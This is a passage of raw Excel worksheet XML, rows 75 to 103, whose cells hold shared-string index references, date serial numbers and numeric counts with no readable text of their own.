      </c>
      <c r="P75" t="s">
        <v>1691</v>
      </c>
      <c r="Q75" t="s">
        <v>3652</v>
      </c>
      <c r="R75">
        <v>1308</v>
      </c>
      <c r="S75">
        <v>881</v>
      </c>
      <c r="T75">
        <v>14105</v>
      </c>
      <c r="U75">
        <v>31279</v>
      </c>
      <c r="V75">
        <v>55684</v>
      </c>
      <c r="W75" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="76" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A76" t="s">
        <v>3</v>
      </c>
      <c r="B76">
        <v>43721.705608032411</v>
      </c>
      <c r="C76" t="s">
        <v>2169</v>
      </c>
      <c r="D76">
        <v>105</v>
      </c>
      <c r="E76" t="s">
        <v>2173</v>
      </c>
      <c r="F76">
        <v>104</v>
      </c>
      <c r="G76" t="s">
        <v>2174</v>
      </c>
      <c r="H76" t="s">
        <v>2175</v>
      </c>
      <c r="I76" t="s">
        <v>38</v>
      </c>
      <c r="J76" t="s">
        <v>38</v>
      </c>
      <c r="K76" t="s">
        <v>38</v>
      </c>
      <c r="L76" t="s">
        <v>38</v>
      </c>
      <c r="M76" t="s">
        <v>38</v>
      </c>
      <c r="N76" t="s">
        <v>38</v>
      </c>
      <c r="O76" t="s">
        <v>2176</v>
      </c>
      <c r="P76" t="s">
        <v>1709</v>
      </c>
      <c r="Q76" t="s">
        <v>3652</v>
      </c>
      <c r="R76">
        <v>396</v>
      </c>
      <c r="S76">
        <v>346</v>
      </c>
      <c r="T76">
        <v>7665</v>
      </c>
      <c r="U76">
        <v>25591</v>
      </c>
      <c r="V76">
        <v>42697</v>
      </c>
      <c r="W76" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="77" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A77" t="s">
        <v>3</v>
      </c>
      <c r="B77">
        <v>43802.501913888889</v>
      </c>
      <c r="C77" t="s">
        <v>2177</v>
      </c>
      <c r="D77">
        <v>1313</v>
      </c>
      <c r="E77" t="s">
        <v>2178</v>
      </c>
      <c r="F77">
        <v>107</v>
      </c>
      <c r="G77" t="s">
        <v>2179</v>
      </c>
      <c r="H77" t="s">
        <v>2180</v>
      </c>
      <c r="I77" t="s">
        <v>185</v>
      </c>
      <c r="J77" t="s">
        <v>186</v>
      </c>
      <c r="K77" t="s">
        <v>22</v>
      </c>
      <c r="L77" t="s">
        <v>77</v>
      </c>
      <c r="M77" t="s">
        <v>1831</v>
      </c>
      <c r="Q77" t="s">
        <v>3647</v>
      </c>
      <c r="W77" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="78" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A78" t="s">
        <v>3</v>
      </c>
      <c r="B78">
        <v>44364.965841481484</v>
      </c>
      <c r="C78" t="s">
        <v>2181</v>
      </c>
      <c r="D78">
        <v>104</v>
      </c>
      <c r="E78" t="s">
        <v>2182</v>
      </c>
      <c r="F78">
        <v>104</v>
      </c>
      <c r="G78" t="s">
        <v>2183</v>
      </c>
      <c r="H78" t="s">
        <v>1074</v>
      </c>
      <c r="I78" t="s">
        <v>268</v>
      </c>
      <c r="J78" t="s">
        <v>269</v>
      </c>
      <c r="K78" t="s">
        <v>10</v>
      </c>
      <c r="L78" t="s">
        <v>77</v>
      </c>
      <c r="M78" t="s">
        <v>290</v>
      </c>
      <c r="N78" t="s">
        <v>291</v>
      </c>
      <c r="Q78" t="s">
        <v>3648</v>
      </c>
      <c r="R78">
        <v>43</v>
      </c>
      <c r="S78">
        <v>85</v>
      </c>
      <c r="T78">
        <v>905</v>
      </c>
      <c r="U78">
        <v>739</v>
      </c>
      <c r="V78">
        <v>1022</v>
      </c>
      <c r="W78" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="79" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A79" t="s">
        <v>3</v>
      </c>
      <c r="B79">
        <v>43707.754125347223</v>
      </c>
      <c r="C79" t="s">
        <v>2075</v>
      </c>
      <c r="D79">
        <v>106</v>
      </c>
      <c r="E79" t="s">
        <v>2184</v>
      </c>
      <c r="F79">
        <v>100</v>
      </c>
      <c r="G79" t="s">
        <v>2185</v>
      </c>
      <c r="H79" t="s">
        <v>2186</v>
      </c>
      <c r="I79" t="s">
        <v>156</v>
      </c>
      <c r="J79" t="s">
        <v>301</v>
      </c>
      <c r="K79" t="s">
        <v>26</v>
      </c>
      <c r="L79" t="s">
        <v>77</v>
      </c>
      <c r="M79" t="s">
        <v>475</v>
      </c>
      <c r="N79" t="s">
        <v>476</v>
      </c>
      <c r="Q79" t="s">
        <v>3646</v>
      </c>
      <c r="W79" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="80" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A80" t="s">
        <v>3</v>
      </c>
      <c r="B80">
        <v>43791.132544571759</v>
      </c>
      <c r="C80" t="s">
        <v>2187</v>
      </c>
      <c r="D80">
        <v>110</v>
      </c>
      <c r="E80" t="s">
        <v>2188</v>
      </c>
      <c r="F80">
        <v>110</v>
      </c>
      <c r="G80" t="s">
        <v>2189</v>
      </c>
      <c r="H80" t="s">
        <v>2190</v>
      </c>
      <c r="I80" t="s">
        <v>156</v>
      </c>
      <c r="J80" t="s">
        <v>301</v>
      </c>
      <c r="K80" t="s">
        <v>26</v>
      </c>
      <c r="L80" t="s">
        <v>77</v>
      </c>
      <c r="M80" t="s">
        <v>475</v>
      </c>
      <c r="N80" t="s">
        <v>476</v>
      </c>
      <c r="Q80" t="s">
        <v>3648</v>
      </c>
      <c r="R80">
        <v>307</v>
      </c>
      <c r="S80">
        <v>283</v>
      </c>
      <c r="T80">
        <v>9505</v>
      </c>
      <c r="U80">
        <v>17756</v>
      </c>
      <c r="V80">
        <v>25535</v>
      </c>
      <c r="W80" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="81" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A81" t="s">
        <v>3</v>
      </c>
      <c r="B81">
        <v>43581.484275254632</v>
      </c>
      <c r="C81" t="s">
        <v>2191</v>
      </c>
      <c r="D81">
        <v>114</v>
      </c>
      <c r="E81" t="s">
        <v>2192</v>
      </c>
      <c r="F81">
        <v>105</v>
      </c>
      <c r="G81" t="s">
        <v>2193</v>
      </c>
      <c r="H81" t="s">
        <v>2194</v>
      </c>
      <c r="I81" t="s">
        <v>185</v>
      </c>
      <c r="J81" t="s">
        <v>186</v>
      </c>
      <c r="K81" t="s">
        <v>22</v>
      </c>
      <c r="L81" t="s">
        <v>77</v>
      </c>
      <c r="M81" t="s">
        <v>1831</v>
      </c>
      <c r="Q81" t="s">
        <v>2195</v>
      </c>
      <c r="T81">
        <v>2622</v>
      </c>
      <c r="U81">
        <v>4319</v>
      </c>
      <c r="V81">
        <v>10033</v>
      </c>
      <c r="W81" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="82" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A82" t="s">
        <v>3</v>
      </c>
      <c r="B82">
        <v>44127.150470520835</v>
      </c>
      <c r="C82" t="s">
        <v>2191</v>
      </c>
      <c r="D82">
        <v>202</v>
      </c>
      <c r="E82" t="s">
        <v>2192</v>
      </c>
      <c r="F82">
        <v>107</v>
      </c>
      <c r="G82" t="s">
        <v>2193</v>
      </c>
      <c r="H82" t="s">
        <v>2194</v>
      </c>
      <c r="I82" t="s">
        <v>185</v>
      </c>
      <c r="J82" t="s">
        <v>186</v>
      </c>
      <c r="K82" t="s">
        <v>22</v>
      </c>
      <c r="L82" t="s">
        <v>77</v>
      </c>
      <c r="M82" t="s">
        <v>1831</v>
      </c>
      <c r="Q82" t="s">
        <v>3647</v>
      </c>
      <c r="T82">
        <v>6075828</v>
      </c>
      <c r="U82">
        <v>8275364</v>
      </c>
      <c r="V82">
        <v>9872008</v>
      </c>
      <c r="W82" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="83" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A83" t="s">
        <v>3</v>
      </c>
      <c r="B83">
        <v>43663.648928819443</v>
      </c>
      <c r="C83" t="s">
        <v>2191</v>
      </c>
      <c r="D83">
        <v>114</v>
      </c>
      <c r="E83" t="s">
        <v>2196</v>
      </c>
      <c r="F83">
        <v>101</v>
      </c>
      <c r="G83" t="s">
        <v>2197</v>
      </c>
      <c r="H83" t="s">
        <v>2198</v>
      </c>
      <c r="I83" t="s">
        <v>185</v>
      </c>
      <c r="J83" t="s">
        <v>186</v>
      </c>
      <c r="K83" t="s">
        <v>22</v>
      </c>
      <c r="L83" t="s">
        <v>77</v>
      </c>
      <c r="M83" t="s">
        <v>1831</v>
      </c>
      <c r="Q83" t="s">
        <v>2195</v>
      </c>
      <c r="U83">
        <v>3</v>
      </c>
      <c r="V83">
        <v>6343</v>
      </c>
      <c r="W83" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="84" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A84" t="s">
        <v>3</v>
      </c>
      <c r="B84">
        <v>44127.150470578701</v>
      </c>
      <c r="C84" t="s">
        <v>2191</v>
      </c>
      <c r="D84">
        <v>202</v>
      </c>
      <c r="E84" t="s">
        <v>2196</v>
      </c>
      <c r="F84">
        <v>102</v>
      </c>
      <c r="G84" t="s">
        <v>2197</v>
      </c>
      <c r="H84" t="s">
        <v>2198</v>
      </c>
      <c r="I84" t="s">
        <v>185</v>
      </c>
      <c r="J84" t="s">
        <v>186</v>
      </c>
      <c r="K84" t="s">
        <v>22</v>
      </c>
      <c r="L84" t="s">
        <v>77</v>
      </c>
      <c r="M84" t="s">
        <v>1831</v>
      </c>
      <c r="Q84" t="s">
        <v>2195</v>
      </c>
      <c r="R84">
        <v>18102</v>
      </c>
      <c r="S84">
        <v>22313</v>
      </c>
      <c r="T84">
        <v>503801</v>
      </c>
      <c r="U84">
        <v>574539</v>
      </c>
      <c r="V84">
        <v>648194</v>
      </c>
      <c r="W84" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="85" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A85" t="s">
        <v>3</v>
      </c>
      <c r="B85">
        <v>43663.648928796298</v>
      </c>
      <c r="C85" t="s">
        <v>2191</v>
      </c>
      <c r="D85">
        <v>114</v>
      </c>
      <c r="E85" t="s">
        <v>2199</v>
      </c>
      <c r="F85">
        <v>101</v>
      </c>
      <c r="G85" t="s">
        <v>2200</v>
      </c>
      <c r="H85" t="s">
        <v>2201</v>
      </c>
      <c r="I85" t="s">
        <v>185</v>
      </c>
      <c r="J85" t="s">
        <v>186</v>
      </c>
      <c r="K85" t="s">
        <v>22</v>
      </c>
      <c r="L85" t="s">
        <v>77</v>
      </c>
      <c r="M85" t="s">
        <v>1831</v>
      </c>
      <c r="Q85" t="s">
        <v>3647</v>
      </c>
      <c r="T85">
        <v>2619</v>
      </c>
      <c r="U85">
        <v>4316</v>
      </c>
      <c r="V85">
        <v>10029</v>
      </c>
      <c r="W85" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="86" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A86" t="s">
        <v>3</v>
      </c>
      <c r="B86">
        <v>44127.150470555556</v>
      </c>
      <c r="C86" t="s">
        <v>2191</v>
      </c>
      <c r="D86">
        <v>202</v>
      </c>
      <c r="E86" t="s">
        <v>2199</v>
      </c>
      <c r="F86">
        <v>102</v>
      </c>
      <c r="G86" t="s">
        <v>2200</v>
      </c>
      <c r="H86" t="s">
        <v>2201</v>
      </c>
      <c r="I86" t="s">
        <v>185</v>
      </c>
      <c r="J86" t="s">
        <v>186</v>
      </c>
      <c r="K86" t="s">
        <v>22</v>
      </c>
      <c r="L86" t="s">
        <v>77</v>
      </c>
      <c r="M86" t="s">
        <v>1831</v>
      </c>
      <c r="Q86" t="s">
        <v>3647</v>
      </c>
      <c r="R86">
        <v>152184</v>
      </c>
      <c r="S86">
        <v>155153</v>
      </c>
      <c r="T86">
        <v>3722015</v>
      </c>
      <c r="U86">
        <v>5605308</v>
      </c>
      <c r="V86">
        <v>6190936</v>
      </c>
      <c r="W86" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="87" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A87" t="s">
        <v>3</v>
      </c>
      <c r="B87">
        <v>43672.605824351849</v>
      </c>
      <c r="C87" t="s">
        <v>2191</v>
      </c>
      <c r="D87">
        <v>114</v>
      </c>
      <c r="E87" t="s">
        <v>2202</v>
      </c>
      <c r="F87">
        <v>103</v>
      </c>
      <c r="G87" t="s">
        <v>2203</v>
      </c>
      <c r="H87" t="s">
        <v>2204</v>
      </c>
      <c r="I87" t="s">
        <v>185</v>
      </c>
      <c r="J87" t="s">
        <v>186</v>
      </c>
      <c r="K87" t="s">
        <v>22</v>
      </c>
      <c r="L87" t="s">
        <v>77</v>
      </c>
      <c r="M87" t="s">
        <v>1831</v>
      </c>
      <c r="Q87" t="s">
        <v>2195</v>
      </c>
      <c r="U87">
        <v>3</v>
      </c>
      <c r="V87">
        <v>6345</v>
      </c>
      <c r="W87" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="88" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A88" t="s">
        <v>3</v>
      </c>
      <c r="B88">
        <v>44127.150470590277</v>
      </c>
      <c r="C88" t="s">
        <v>2191</v>
      </c>
      <c r="D88">
        <v>202</v>
      </c>
      <c r="E88" t="s">
        <v>2202</v>
      </c>
      <c r="F88">
        <v>104</v>
      </c>
      <c r="G88" t="s">
        <v>2203</v>
      </c>
      <c r="H88" t="s">
        <v>2204</v>
      </c>
      <c r="I88" t="s">
        <v>185</v>
      </c>
      <c r="J88" t="s">
        <v>186</v>
      </c>
      <c r="K88" t="s">
        <v>22</v>
      </c>
      <c r="L88" t="s">
        <v>77</v>
      </c>
      <c r="M88" t="s">
        <v>1831</v>
      </c>
      <c r="Q88" t="s">
        <v>2195</v>
      </c>
      <c r="R88">
        <v>9049</v>
      </c>
      <c r="S88">
        <v>8592</v>
      </c>
      <c r="T88">
        <v>152037</v>
      </c>
      <c r="U88">
        <v>287411</v>
      </c>
      <c r="V88">
        <v>307751</v>
      </c>
      <c r="W88" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="89" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A89" t="s">
        <v>3</v>
      </c>
      <c r="B89">
        <v>43571.43165849537</v>
      </c>
      <c r="C89" t="s">
        <v>2191</v>
      </c>
      <c r="D89">
        <v>114</v>
      </c>
      <c r="E89" t="s">
        <v>2205</v>
      </c>
      <c r="F89">
        <v>106</v>
      </c>
      <c r="G89" t="s">
        <v>2206</v>
      </c>
      <c r="H89" t="s">
        <v>2207</v>
      </c>
      <c r="I89" t="s">
        <v>185</v>
      </c>
      <c r="J89" t="s">
        <v>186</v>
      </c>
      <c r="K89" t="s">
        <v>22</v>
      </c>
      <c r="L89" t="s">
        <v>77</v>
      </c>
      <c r="M89" t="s">
        <v>1831</v>
      </c>
      <c r="Q89" t="s">
        <v>3647</v>
      </c>
      <c r="T89">
        <v>2621</v>
      </c>
      <c r="U89">
        <v>4313</v>
      </c>
      <c r="V89">
        <v>4463</v>
      </c>
      <c r="W89" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="90" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A90" t="s">
        <v>3</v>
      </c>
      <c r="B90">
        <v>44127.150470601853</v>
      </c>
      <c r="C90" t="s">
        <v>2191</v>
      </c>
      <c r="D90">
        <v>202</v>
      </c>
      <c r="E90" t="s">
        <v>2205</v>
      </c>
      <c r="F90">
        <v>201</v>
      </c>
      <c r="G90" t="s">
        <v>2206</v>
      </c>
      <c r="H90" t="s">
        <v>2207</v>
      </c>
      <c r="I90" t="s">
        <v>185</v>
      </c>
      <c r="J90" t="s">
        <v>186</v>
      </c>
      <c r="K90" t="s">
        <v>22</v>
      </c>
      <c r="L90" t="s">
        <v>77</v>
      </c>
      <c r="M90" t="s">
        <v>1831</v>
      </c>
      <c r="Q90" t="s">
        <v>3647</v>
      </c>
      <c r="R90">
        <v>191930</v>
      </c>
      <c r="S90">
        <v>204974</v>
      </c>
      <c r="T90">
        <v>4214475</v>
      </c>
      <c r="U90">
        <v>6780818</v>
      </c>
      <c r="V90">
        <v>7608985</v>
      </c>
      <c r="W90" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="91" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A91" t="s">
        <v>3</v>
      </c>
      <c r="B91">
        <v>43644.657267199073</v>
      </c>
      <c r="C91" t="s">
        <v>2191</v>
      </c>
      <c r="D91">
        <v>114</v>
      </c>
      <c r="E91" t="s">
        <v>2208</v>
      </c>
      <c r="F91">
        <v>106</v>
      </c>
      <c r="G91" t="s">
        <v>2209</v>
      </c>
      <c r="H91" t="s">
        <v>2210</v>
      </c>
      <c r="I91" t="s">
        <v>185</v>
      </c>
      <c r="J91" t="s">
        <v>186</v>
      </c>
      <c r="K91" t="s">
        <v>22</v>
      </c>
      <c r="L91" t="s">
        <v>77</v>
      </c>
      <c r="M91" t="s">
        <v>1831</v>
      </c>
      <c r="Q91" t="s">
        <v>3647</v>
      </c>
      <c r="W91" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="92" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A92" t="s">
        <v>3</v>
      </c>
      <c r="B92">
        <v>44127.15047054398</v>
      </c>
      <c r="C92" t="s">
        <v>2191</v>
      </c>
      <c r="D92">
        <v>202</v>
      </c>
      <c r="E92" t="s">
        <v>2208</v>
      </c>
      <c r="F92">
        <v>107</v>
      </c>
      <c r="G92" t="s">
        <v>2209</v>
      </c>
      <c r="H92" t="s">
        <v>2210</v>
      </c>
      <c r="I92" t="s">
        <v>185</v>
      </c>
      <c r="J92" t="s">
        <v>186</v>
      </c>
      <c r="K92" t="s">
        <v>22</v>
      </c>
      <c r="L92" t="s">
        <v>77</v>
      </c>
      <c r="M92" t="s">
        <v>1831</v>
      </c>
      <c r="Q92" t="s">
        <v>2195</v>
      </c>
      <c r="W92" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="93" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A93" t="s">
        <v>3</v>
      </c>
      <c r="B93">
        <v>44292.082165092594</v>
      </c>
      <c r="C93" t="s">
        <v>2211</v>
      </c>
      <c r="D93">
        <v>120</v>
      </c>
      <c r="E93" t="s">
        <v>2212</v>
      </c>
      <c r="F93">
        <v>120</v>
      </c>
      <c r="G93" t="s">
        <v>2213</v>
      </c>
      <c r="H93" t="s">
        <v>2214</v>
      </c>
      <c r="I93" t="s">
        <v>156</v>
      </c>
      <c r="J93" t="s">
        <v>301</v>
      </c>
      <c r="K93" t="s">
        <v>26</v>
      </c>
      <c r="L93" t="s">
        <v>77</v>
      </c>
      <c r="M93" t="s">
        <v>475</v>
      </c>
      <c r="N93" t="s">
        <v>476</v>
      </c>
      <c r="Q93" t="s">
        <v>3648</v>
      </c>
      <c r="R93">
        <v>13673</v>
      </c>
      <c r="S93">
        <v>13128</v>
      </c>
      <c r="T93">
        <v>212405</v>
      </c>
      <c r="U93">
        <v>367010</v>
      </c>
      <c r="V93">
        <v>412860</v>
      </c>
      <c r="W93" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="94" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A94" t="s">
        <v>3</v>
      </c>
      <c r="B94">
        <v>44292.08282974537</v>
      </c>
      <c r="C94" t="s">
        <v>2215</v>
      </c>
      <c r="D94">
        <v>120</v>
      </c>
      <c r="E94" t="s">
        <v>2216</v>
      </c>
      <c r="F94">
        <v>120</v>
      </c>
      <c r="G94" t="s">
        <v>2217</v>
      </c>
      <c r="H94" t="s">
        <v>2218</v>
      </c>
      <c r="I94" t="s">
        <v>156</v>
      </c>
      <c r="J94" t="s">
        <v>301</v>
      </c>
      <c r="K94" t="s">
        <v>26</v>
      </c>
      <c r="L94" t="s">
        <v>77</v>
      </c>
      <c r="M94" t="s">
        <v>475</v>
      </c>
      <c r="N94" t="s">
        <v>476</v>
      </c>
      <c r="Q94" t="s">
        <v>3648</v>
      </c>
      <c r="R94">
        <v>11186</v>
      </c>
      <c r="S94">
        <v>10763</v>
      </c>
      <c r="T94">
        <v>171282</v>
      </c>
      <c r="U94">
        <v>290779</v>
      </c>
      <c r="V94">
        <v>329890</v>
      </c>
      <c r="W94" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="95" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A95" t="s">
        <v>3</v>
      </c>
      <c r="B95">
        <v>43663.662263425926</v>
      </c>
      <c r="C95" t="s">
        <v>2177</v>
      </c>
      <c r="D95">
        <v>1313</v>
      </c>
      <c r="E95" t="s">
        <v>2219</v>
      </c>
      <c r="F95">
        <v>106</v>
      </c>
      <c r="G95" t="s">
        <v>2220</v>
      </c>
      <c r="H95" t="s">
        <v>2221</v>
      </c>
      <c r="I95" t="s">
        <v>185</v>
      </c>
      <c r="J95" t="s">
        <v>186</v>
      </c>
      <c r="K95" t="s">
        <v>22</v>
      </c>
      <c r="L95" t="s">
        <v>77</v>
      </c>
      <c r="M95" t="s">
        <v>1831</v>
      </c>
      <c r="Q95" t="s">
        <v>3647</v>
      </c>
      <c r="U95">
        <v>3</v>
      </c>
      <c r="V95">
        <v>6344</v>
      </c>
      <c r="W95" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="96" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A96" t="s">
        <v>3</v>
      </c>
      <c r="B96">
        <v>43663.66226341435</v>
      </c>
      <c r="C96" t="s">
        <v>2177</v>
      </c>
      <c r="D96">
        <v>1313</v>
      </c>
      <c r="E96" t="s">
        <v>2222</v>
      </c>
      <c r="F96">
        <v>105</v>
      </c>
      <c r="G96" t="s">
        <v>2223</v>
      </c>
      <c r="H96" t="s">
        <v>2224</v>
      </c>
      <c r="I96" t="s">
        <v>185</v>
      </c>
      <c r="J96" t="s">
        <v>186</v>
      </c>
      <c r="K96" t="s">
        <v>22</v>
      </c>
      <c r="L96" t="s">
        <v>77</v>
      </c>
      <c r="M96" t="s">
        <v>1831</v>
      </c>
      <c r="Q96" t="s">
        <v>3647</v>
      </c>
      <c r="R96">
        <v>82</v>
      </c>
      <c r="S96">
        <v>54</v>
      </c>
      <c r="T96">
        <v>1180</v>
      </c>
      <c r="U96">
        <v>2028</v>
      </c>
      <c r="V96">
        <v>8587</v>
      </c>
      <c r="W96" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="97" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A97" t="s">
        <v>3</v>
      </c>
      <c r="B97">
        <v>43669.752765289355</v>
      </c>
      <c r="C97" t="s">
        <v>2177</v>
      </c>
      <c r="D97">
        <v>1313</v>
      </c>
      <c r="E97" t="s">
        <v>2225</v>
      </c>
      <c r="F97">
        <v>103</v>
      </c>
      <c r="G97" t="s">
        <v>2226</v>
      </c>
      <c r="H97" t="s">
        <v>2227</v>
      </c>
      <c r="I97" t="s">
        <v>185</v>
      </c>
      <c r="J97" t="s">
        <v>186</v>
      </c>
      <c r="K97" t="s">
        <v>22</v>
      </c>
      <c r="L97" t="s">
        <v>77</v>
      </c>
      <c r="M97" t="s">
        <v>1831</v>
      </c>
      <c r="Q97" t="s">
        <v>3647</v>
      </c>
      <c r="R97">
        <v>9558</v>
      </c>
      <c r="S97">
        <v>8918</v>
      </c>
      <c r="T97">
        <v>187478</v>
      </c>
      <c r="U97">
        <v>302564</v>
      </c>
      <c r="V97">
        <v>347959</v>
      </c>
      <c r="W97" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="98" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A98" t="s">
        <v>3</v>
      </c>
      <c r="B98">
        <v>43719.397825092594</v>
      </c>
      <c r="C98" t="s">
        <v>2177</v>
      </c>
      <c r="D98">
        <v>1313</v>
      </c>
      <c r="E98" t="s">
        <v>2228</v>
      </c>
      <c r="F98">
        <v>107</v>
      </c>
      <c r="G98" t="s">
        <v>2229</v>
      </c>
      <c r="H98" t="s">
        <v>2230</v>
      </c>
      <c r="I98" t="s">
        <v>185</v>
      </c>
      <c r="J98" t="s">
        <v>186</v>
      </c>
      <c r="K98" t="s">
        <v>22</v>
      </c>
      <c r="L98" t="s">
        <v>77</v>
      </c>
      <c r="M98" t="s">
        <v>1831</v>
      </c>
      <c r="Q98" t="s">
        <v>3647</v>
      </c>
      <c r="R98">
        <v>72963</v>
      </c>
      <c r="S98">
        <v>75377</v>
      </c>
      <c r="T98">
        <v>1733982</v>
      </c>
      <c r="U98">
        <v>2635731</v>
      </c>
      <c r="V98">
        <v>2662445</v>
      </c>
      <c r="W98" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="99" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A99" t="s">
        <v>3</v>
      </c>
      <c r="B99">
        <v>43663.662263402781</v>
      </c>
      <c r="C99" t="s">
        <v>2177</v>
      </c>
      <c r="D99">
        <v>1313</v>
      </c>
      <c r="E99" t="s">
        <v>2231</v>
      </c>
      <c r="F99">
        <v>107</v>
      </c>
      <c r="G99" t="s">
        <v>2232</v>
      </c>
      <c r="H99" t="s">
        <v>2233</v>
      </c>
      <c r="I99" t="s">
        <v>185</v>
      </c>
      <c r="J99" t="s">
        <v>186</v>
      </c>
      <c r="K99" t="s">
        <v>22</v>
      </c>
      <c r="L99" t="s">
        <v>77</v>
      </c>
      <c r="M99" t="s">
        <v>1831</v>
      </c>
      <c r="Q99" t="s">
        <v>3647</v>
      </c>
      <c r="R99">
        <v>15</v>
      </c>
      <c r="S99">
        <v>15</v>
      </c>
      <c r="T99">
        <v>3265</v>
      </c>
      <c r="U99">
        <v>5408</v>
      </c>
      <c r="V99">
        <v>5312</v>
      </c>
      <c r="W99" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="100" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A100" t="s">
        <v>3</v>
      </c>
      <c r="B100">
        <v>43889.399719895831</v>
      </c>
      <c r="C100" t="s">
        <v>2234</v>
      </c>
      <c r="D100">
        <v>110</v>
      </c>
      <c r="E100" t="s">
        <v>2235</v>
      </c>
      <c r="F100">
        <v>110</v>
      </c>
      <c r="G100" t="s">
        <v>2236</v>
      </c>
      <c r="H100" t="s">
        <v>2237</v>
      </c>
      <c r="I100" t="s">
        <v>156</v>
      </c>
      <c r="J100" t="s">
        <v>301</v>
      </c>
      <c r="K100" t="s">
        <v>26</v>
      </c>
      <c r="L100" t="s">
        <v>77</v>
      </c>
      <c r="M100" t="s">
        <v>475</v>
      </c>
      <c r="N100" t="s">
        <v>476</v>
      </c>
      <c r="Q100" t="s">
        <v>3648</v>
      </c>
      <c r="R100">
        <v>414</v>
      </c>
      <c r="S100">
        <v>390</v>
      </c>
      <c r="T100">
        <v>6921</v>
      </c>
      <c r="U100">
        <v>12382</v>
      </c>
      <c r="V100">
        <v>16420</v>
      </c>
      <c r="W100" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="101" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A101" t="s">
        <v>3</v>
      </c>
      <c r="B101">
        <v>43883.342491793985</v>
      </c>
      <c r="C101" t="s">
        <v>199</v>
      </c>
      <c r="D101">
        <v>110</v>
      </c>
      <c r="E101" t="s">
        <v>205</v>
      </c>
      <c r="F101">
        <v>110</v>
      </c>
      <c r="G101" t="s">
        <v>206</v>
      </c>
      <c r="H101" t="s">
        <v>202</v>
      </c>
      <c r="I101" t="s">
        <v>203</v>
      </c>
      <c r="J101" t="s">
        <v>204</v>
      </c>
      <c r="K101" t="s">
        <v>16</v>
      </c>
      <c r="L101" t="s">
        <v>83</v>
      </c>
      <c r="M101" t="s">
        <v>72</v>
      </c>
      <c r="Q101" t="s">
        <v>3653</v>
      </c>
      <c r="R101">
        <v>2</v>
      </c>
      <c r="S101">
        <v>4</v>
      </c>
      <c r="T101">
        <v>2632</v>
      </c>
      <c r="U101">
        <v>3818</v>
      </c>
      <c r="V101">
        <v>144415</v>
      </c>
      <c r="W101" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="102" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A102" t="s">
        <v>3</v>
      </c>
      <c r="B102">
        <v>43523.642920231483</v>
      </c>
      <c r="C102" t="s">
        <v>468</v>
      </c>
      <c r="D102">
        <v>301</v>
      </c>
      <c r="E102" t="s">
        <v>469</v>
      </c>
      <c r="F102">
        <v>301</v>
      </c>
      <c r="G102" t="s">
        <v>470</v>
      </c>
      <c r="H102" t="s">
        <v>474</v>
      </c>
      <c r="I102" t="s">
        <v>156</v>
      </c>
      <c r="J102" t="s">
        <v>301</v>
      </c>
      <c r="K102" t="s">
        <v>26</v>
      </c>
      <c r="L102" t="s">
        <v>77</v>
      </c>
      <c r="M102" t="s">
        <v>475</v>
      </c>
      <c r="N102" t="s">
        <v>476</v>
      </c>
      <c r="O102" t="s">
        <v>477</v>
      </c>
      <c r="Q102" t="s">
        <v>478</v>
      </c>
      <c r="W102" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="103" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A103" t="s">
        <v>3</v>
      </c>
      <c r="B103">
        <v>43523.642920254628</v>
      </c>
      <c r="C103" t="s">
        <v>468</v>
      </c>
      <c r="D103">
        <v>301</v>
      </c>
      <c r="E103" t="s">
        <v>487</v>
      </c>
      <c r="F103">
        <v>301</v>
      </c>
      <c r="G103" t="s">
        <v>488</v>
      </c>
      <c r="H103" t="s">
        <v>489</v>
      </c>
      <c r="I103" t="s">
        <v>156</v>
      </c>
      <c r="J103" t="s">
        <v>301</v>
      </c>
      <c r="K103" t="s">
        <v>26</v>
      </c>
      <c r="L103" t="s">
